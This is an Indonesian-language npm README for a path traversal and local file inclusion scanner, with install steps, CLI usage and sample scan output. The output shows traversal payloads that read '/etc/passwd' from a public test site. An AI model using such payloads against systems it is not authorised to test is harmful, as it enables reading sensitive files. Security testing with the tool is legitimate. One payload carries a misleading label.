@odaysec/ptscanner
v1.0.3
Published
Advanced Path Traversal Vulnerability Scanner - Node.js Port of ApachSAL
Maintainers
Readme
PTScanner - Advanced Path Traversal Vulnerability Scanner
PTScanner adalah alat profesional untuk mendeteksi kerentanan Path Traversal/Local File Inclusion (LFI), di-porting dari ApachSAL versi Python ke Node.js dengan berbagai peningkatan performa dan fitur.
Fitur Utama
- 20+ Payload Spesifik - Koleksi payload Path Traversal yang terus diperbarui
- Deteksi Akurat - Menggunakan pola regex dan signature khusus
- Multi-Platform - Mendeteksi kerentanan di Unix, Windows, dan aplikasi web
- CLI Powerful - Antarmuka command-line yang mudah digunakan
- Output Terstruktur - Hasil scan dalam format yang mudah dibaca
Instalasi
Instalasi Global (Direkomendasikan):
npm install -g ptscannerInstalasi Lokal:
npm install ptscannerVia GitHub:
git clone https://github.com/odaysec/ptscanner.git
cd ptscanner
npm install
npm linkPenggunaan Dasar
Scan target URL:
ptscanner scan --url "http://target.com/vulnerable.php?file=" --output hasil.txtOpsi Command:
| Opsi | Deskripsi | Default |
|-------------|--------------------------------------------|---------------|
| -u, --url | URL target (harus mengandung parameter) | Required |
| -o, --output | File output untuk menyimpan hasil | results.txt |
| -v, --verbose | Mode verbose (debugging) | false |
Demo Penggunaan
Scan dasar dengan output default:
ptscanner scan -u "http://example.com/page.php?document="Scan dengan output custom:
ptscanner scan -u "http://testphp.vulnweb.com/showimage.php?file=" -o lfi_results.txtDemo Output:
[+] Memulai scan: http://testphp.vulnweb.com/showimage.php?file=
[+] Memuat 20 payload...
[✔] VULN: Basic Directory Traversal (Unix) - Status: 200
[✔] VULN: Null Byte Injection - Status: 200
Scan selesai! Hasil disimpan di: lfi_results.txtFormat Output
File output akan berisi:
[VULNERABILITY FOUND]
URL: http://testphp.vulnweb.com/showimage.php?file=../../../../etc/passwd
Payload: Basic Directory Traversal (Unix)
Status Code: 200
Detection Pattern: root:x:
---
[VULNERABILITY FOUND]
URL: http://testphp.vulnweb.com/showimage.php?file=....//....//....//....//etc/passwd
Payload: Double Encoding
Status Code: 200
Detection Pattern: root:x:Customisasi Payload
Anda dapat menambahkan payload custom dengan mengedit file payloads.json:
{
"name": "Custom Payload",
"path": "custom/traversal/payload",
"pattern": "custom_pattern"
}Lisensi
Proyek ini dilisensikan di bawah MIT License.
